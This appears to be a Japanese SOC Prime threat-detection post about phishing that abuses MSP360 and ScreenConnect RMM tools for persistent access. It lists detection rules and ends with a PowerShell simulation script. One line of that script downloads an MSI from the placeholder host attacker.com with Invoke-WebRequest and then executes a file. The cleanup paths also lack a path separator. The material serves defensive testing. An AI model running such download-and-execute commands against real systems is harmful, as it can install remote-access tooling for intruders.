SOC Prime Bias: High

01 Oct 2026 08:13 UTC

フィッシングがRMMツールを悪用して持続的なアクセスを確保

Author Photo
SOC Prime Team linkedin icon フォローする
フィッシングがRMMツールを悪用して持続的なアクセスを確保
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

脅威アクターは、フィッシングキャンペーンを利用して、信頼されたソフトウェアと偽装された正当なMSP360 RMMインストーラーを配信しています。起動すると、このインストーラーは永続性を確立し、その後、ConnectWise ScreenConnectをダウンロードおよび展開して、攻撃者に追加のリモートアクセスチャネルを提供します。これにより、資格情報の盗難や機密データの収集を含むさらなる侵害後の活動が可能になります。

調査

Microsoft Defender Expertsは、Zoom、Adobe、正当な会議の招待状に偽装した複数のフィッシングの誘惑を特定し、MSP360 v2.5.0.67を配布しました。研究者は感染経路を再構築し、初期のユーザー実行とUACの昇格を通じてサービスのインストールと二次RMMツールの展開をたどりました。調査により、攻撃者がAmazon S3やDropboxなどの信頼されたクラウドプラットフォームを悪用して、悪意のあるペイロードをホストしていることも明らかになりました。

軽減策

組織は、MFAを適用し、許可されていないインストールを防止するためのアプリケーションコントロールポリシーを実施することで、承認されたRMMツールを厳密に管理する必要があります。証明書ベースのブロックルールによって、特定の署名アプリケーションをさらに制限できます。クラウド提供のウイルス対策保護と攻撃面削減ルールを強化して、露出を減らすことも重要です。

対応

許可されていないRMMインストールが発見された場合、セキュリティチームは影響を受けたサービスインストールに関連付けられた資格情報を直ちにリセットする必要があります。システムレベルアカウントが疑われる場合は、攻撃の全体的な範囲を特定するための包括的な調査が必要です。エンドポイント検出ログを確認して、疑わしいリモート管理セッションおよび関連する侵害後の活動を特定します。

攻撃フロー

この部分はまだ更新中です。

検出

PowerShellを介したダウンロードまたはアップロード(cmdline経由)

SOCプライムチーム
2026年9月30日

異常なコードページ変更の実行(cmdline経由)

SOCプライムチーム
2026年9月30日

代替リモートアクセス/管理ソフトウェア(process_creation経由)

SOCプライムチーム
2026年9月30日

PowerShellからの.NETメソッドの呼び出しを疑う(powershell経由)

SOCプライムチーム
2026年9月30日

異常なトップレベルドメイン(TLD)のDNSリクエストによる疑わしいコマンド&コントロール(dns経由)

SOCプライムチーム
2026年9月30日

検出するためのIOCs(HashSha256):フィッシングのRMMツール悪用による永続的アクセス

SOCプライムAIルール
2026年9月30日

検出するためのIOCs(HashSha1):フィッシングのRMMツール悪用による永続的アクセス

SOCプライムAIルール
2026年9月30日

PowerShellのInvoke-WebRequestによるリモートMSIパッケージダウンロードを検出 [Windows Powershell]

SOCプライムAIルール
2026年9月30日

フィッシングによるRMMツールの悪用による永続的アクセス [Windowsプロセス作成]

SOCプライムAIルール
2026年9月30日

シミュレーション実行

  • 攻撃ナラティブとコマンド: 敵対者はスピアフィッシングキャンペーンを開始します。被害者はリンクをクリックし、PowerShellのワンライナーをトリガーします。このコマンドは Invoke-WebRequest を使用して、 ClientSetup.msi (ScreenConnectインストーラーをシミュレート)を遠隔サーバーからダウンロードします。ダウンロード後、攻撃者はMSIを実行し、シミュレーションの最終ステップでは ScreenConnect.WindowsClient.exe を起動して確立されたリモートアクセスセッションを模倣します。このシーケンスは selection_2 AND selection_3 ルールのロジックをトリガーするように設計されています。

  • 回帰テストスクリプト:

    # フィッシングベースのRMM展開のシミュレーション
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. PowerShellのダウンロードをシミュレート(Selection 2 part A)
    Write-Host "[+] MSIのPowerShellダウンロードをシミュレートしています..."
    # ダミーファイルを使用してMSIダウンロードをシミュレート
    New-Item -Path $msiPath -ItemType File -Force
    
    # このコマンドはルールの 'Invoke-WebRequest'と 'ClientSetup.msi'のロジックに一致します
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. ScreenConnectクライアントをシミュレートするダミーの実行可能ファイルを作成(Selection 3)
    Write-Host "[+] ダミーのScreenConnect実行可能ファイルを作成しています..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. クライアントを実行(Selection 3およびSelection 2の完了)
    Write-Host "[+] ScreenConnectクライアントを実行中..."
    Start-Process -FilePath $exePath
  • クリーンアップコマンド:

    # シミュレーションアーティファクトのクリーンアップ
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] クリーンアップ完了。"